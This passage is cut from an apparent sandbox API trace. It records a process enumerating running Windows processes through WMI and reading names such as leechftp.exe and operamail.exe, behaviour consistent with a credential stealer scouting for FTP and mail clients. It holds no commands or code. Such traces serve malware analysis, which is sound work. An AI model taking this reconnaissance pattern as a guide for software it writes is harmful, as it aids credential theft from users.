ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.364] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630a18, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561c138) returned 0x0 [0214.364] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561c138, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.364] WbemDefPath:IUnknown:Release (This=0x561c138) returned 0x3 [0214.364] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.364] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.364] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630a18, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.365] WbemDefPath:IUnknown:Release (This=0x5630a18) returned 0x2 [0214.365] WbemDefPath:IUnknown:Release (This=0x5630a18) returned 0x1 [0214.365] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.365] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.365] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630a18, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630a18) returned 0x0 [0214.365] WbemDefPath:IUnknown:AddRef (This=0x5630a18) returned 0x3 [0214.365] WbemDefPath:IUnknown:Release (This=0x5630a18) returned 0x2 [0214.365] WbemDefPath:IWbemPath:SetText (This=0x5630a18, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x0 [0214.365] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.365] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.365] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.365] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.365] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.365] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.365] IWbemClassObject:Get (in: This=0x562e530, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268ffc4*=0, plFlavor=0x268ffc8*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="leechftp.exe", varVal2=0x0), pType=0x268ffc4*=8, plFlavor=0x268ffc8*=0) returned 0x0 [0214.365] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0214.365] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0214.365] IWbemClassObject:Get (in: This=0x562e530, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268ffc4*=8, plFlavor=0x268ffc8*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="leechftp.exe", varVal2=0x0), pType=0x268ffc4*=8, plFlavor=0x268ffc8*=0) returned 0x0 [0214.366] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0214.366] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0214.366] CoTaskMemAlloc (cb=0x4) returned 0x5631de8 [0214.366] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631de8, puReturned=0x267acc0 | out: apObjects=0x5631de8*=0x562e6c8, puReturned=0x267acc0*=0x1) returned 0x0 [0214.458] IUnknown:QueryInterface (in: This=0x562e6c8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562e6c8) returned 0x0 [0214.459] IUnknown:QueryInterface (in: This=0x562e6c8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.459] IUnknown:QueryInterface (in: This=0x562e6c8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.459] IUnknown:AddRef (This=0x562e6c8) returned 0x3 [0214.459] IUnknown:QueryInterface (in: This=0x562e6c8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.459] IUnknown:QueryInterface (in: This=0x562e6c8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.459] IUnknown:QueryInterface (in: This=0x562e6c8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562e6cc) returned 0x0 [0214.459] IMarshal:GetUnmarshalClass (in: This=0x562e6cc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.459] IUnknown:Release (This=0x562e6cc) returned 0x3 [0214.459] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.459] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.459] IUnknown:QueryInterface (in: This=0x562e6c8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.459] IUnknown:Release (This=0x562e6c8) returned 0x2 [0214.459] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.460] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.460] IUnknown:QueryInterface (in: This=0x562e6c8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562e6c8) returned 0x0 [0214.460] IUnknown:AddRef (This=0x562e6c8) returned 0x4 [0214.460] IUnknown:Release (This=0x562e6c8) returned 0x3 [0214.460] IUnknown:Release (This=0x562e6c8) returned 0x2 [0214.460] CoTaskMemFree (pv=0x5631de8) [0214.460] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.460] IUnknown:AddRef (This=0x562e6c8) returned 0x3 [0214.460] IWbemClassObject:Get (in: This=0x562e6c8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.460] IWbemClassObject:Get (in: This=0x562e6c8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.460] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x66 [0214.461] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x66 [0214.461] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.461] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.461] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.461] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.462] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631de8) returned 0x0 [0214.462] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631de8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.462] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631de8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630af8) returned 0x0 [0214.462] WbemDefPath:IUnknown:Release (This=0x5631de8) returned 0x0 [0214.462] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630af8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630af8) returned 0x0 [0214.462] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630af8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.463] WbemDefPath:IUnknown:AddRef (This=0x5630af8) returned 0x3 [0214.463] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630af8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.463] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630af8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.463] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630af8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631df8) returned 0x0 [0214.463] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631df8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.463] WbemDefPath:IUnknown:Release (This=0x5631df8) returned 0x3 [0214.463] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.463] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.463] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630af8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.463] WbemDefPath:IUnknown:Release (This=0x5630af8) returned 0x2 [0214.463] WbemDefPath:IUnknown:Release (This=0x5630af8) returned 0x1 [0214.463] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.463] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.463] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630af8, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630af8) returned 0x0 [0214.463] WbemDefPath:IUnknown:AddRef (This=0x5630af8) returned 0x3 [0214.463] WbemDefPath:IUnknown:Release (This=0x5630af8) returned 0x2 [0214.464] WbemDefPath:IWbemPath:SetText (This=0x5630af8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x0 [0214.464] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.464] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.464] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.464] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.464] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.464] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.464] IWbemClassObject:Get (in: This=0x562e6c8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2690844*=0, plFlavor=0x2690848*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="operamail.exe", varVal2=0x0), pType=0x2690844*=8, plFlavor=0x2690848*=0) returned 0x0 [0214.464] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0214.464] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0214.464] IWbemClassObject:Get (in: This=0x562e6c8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2690844*=8, plFlavor=0x2690848*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="operamail.exe", varVal2=0x0), pType=0x2690844*=8, plFlavor=0x2690848*=0) returned 0x0 [0214.464] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0214.465] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0214.465] CoTaskMemAlloc (cb=0x4) returned 0x5631e28 [0214.465] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631e28, puReturned=0x267acc0 | out: apObjects=0x5631e28*=0x562e860, puReturned=0x267acc0*=0x1) returned 0x0 [0214.467] IUnknown:QueryInterface (in: This=0x562e860, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562e860) returned 0x0 [0214.467] IUnknown:QueryInterface (in: This=0x562e860, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.467] IUnknown:QueryInterface (in: This=0x562e860, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.467] IUnknown:AddRef (This=0x562e860) returned 0x3 [0214.467] IUnknown:QueryInterface (in: This=0x562e860, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.467] IUnknown:QueryInterface (in: This=0x562e860, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.467] IUnknown:QueryInterface (in: This=0x562e860, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562e864) returned 0x0 [0214.467] IMarshal:GetUnmarshalClass (in: This=0x562e864, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.467] IUnknown:Release (This=0x562e864) returned 0x3 [0214.467] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.467] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.467] IUnknown:QueryInterface (in: This=0x562e860, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.468] IUnknown:Release (This=0x562e860) returned 0x2 [0214.468] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.468] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.468] IUnknown:QueryInterface (in: This=0x562e860, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562e860) returned 0x0 [0214.468] IUnknown:AddRef (This=0x562e860) returned 0x4 [0214.468] IUnknown:Release (This=0x562e860) returned 0x3 [0214.468] IUnknown:Release (This=0x562e860) returned 0x2 [0214.468] CoTaskMemFree (pv=0x5631e28) [0214.468] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.468] IUnknown:AddRef (This=0x562e860) returned 0x3 [0214.468] IWbemClassObject:Get (in: This=0x562e860, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.468] IWbemClassObject:Get (in: This=0x562e860, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.469] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x66 [0214.469] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x66 [0214.469] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.469] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.469] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.469] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.470] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631e28) returned 0x0 [0214.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631e28, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.470] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631e28, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630bd8) returned 0x0 [0214.470] WbemDefPath:IUnknown:Release (This=0x5631e28) returned 0x0 [0214.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630bd8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630bd8) returned 0x0 [0214.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630bd8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, 